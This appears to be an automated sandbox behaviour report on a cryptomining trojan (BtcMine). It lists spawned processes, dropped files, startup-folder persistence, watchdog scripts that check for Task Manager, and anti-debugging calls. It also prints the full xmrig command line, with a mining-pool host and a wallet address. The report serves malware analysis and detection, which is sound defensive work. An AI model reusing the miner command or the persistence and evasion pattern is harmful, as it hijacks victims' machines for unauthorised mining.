Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" "			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Drivers\xmrig.exe xmrig.exe --donate-level 5 -o pool.supportxmr.com:443 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k --tls -p speed
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"

Source: Updater.lnk.0.dr

LNK file: ..\..\..\..\..\..\..\..\..\ProgramData\Drivers\winproc.vbs

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Static file information: File size 3265880 > 1048576

Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe, 00000000.00000003.2394891325.0000017F413C5000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.0.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

File created: C:\ProgramData\Drivers\__tmp_rar_sfx_access_check_5778718

Jump to behavior

Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Static PE information: section name: .didat
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Static PE information: section name: _RDATA
Source: xmrig.exe.0.dr	Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Code function: 0_2_00007FF717564D00 pushfq ; iretd

0_2_00007FF717564D01

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

File created: C:\ProgramData\Drivers\WinRing0x64.sys

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	File created: C:\ProgramData\Drivers\xmrig.exe			Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	File created: C:\ProgramData\Drivers\WinRing0x64.sys			Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	File created: C:\ProgramData\Drivers\xmrig.exe			Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	File created: C:\ProgramData\Drivers\WinRing0x64.sys			Jump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.lnk

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\xmrig.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\ProgramData\Drivers\xmrig.exe

System information queried: FirmwareTableInformation

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 3161			Jump to behavior
Source: C:\ProgramData\Drivers\xmrig.exe	Window / User API: threadDelayed 9954
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 3152

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Dropped PE file which has not been started: C:\ProgramData\Drivers\WinRing0x64.sys

Jump to dropped file

Source: C:\ProgramData\Drivers\xmrig.exe TID: 7140

Thread sleep count: 9954 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF7175340CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,		0_2_00007FF7175340CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71754ADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,		0_2_00007FF71754ADF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71755F900 FindFirstFileExA,		0_2_00007FF71755F900

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Code function: 0_2_00007FF717551304 VirtualQuery,GetSystemInfo,

0_2_00007FF717551304

Source: xmrig.exe, 0000000F.00000002.4860425043.000002D377929000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWHq4u
Source: xmrig.exe, 0000000F.00000002.4860425043.000002D377929000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Anti Debugging

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Code function: 0_2_00007FF717557338 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF717557338

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Code function: 0_2_00007FF717560980 GetProcessHeap,

0_2_00007FF717560980

Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF717557338 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00007FF717557338
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF717552170 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00007FF717552170
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF717552FB4 SetUnhandledExceptionFilter,		0_2_00007FF717552FB4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF717552DD0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00007FF717552DD0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Code function: 0_2_00007FF71754ADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF71754ADF0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs"			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" "			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\1.vbs"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak			Jump to behavior
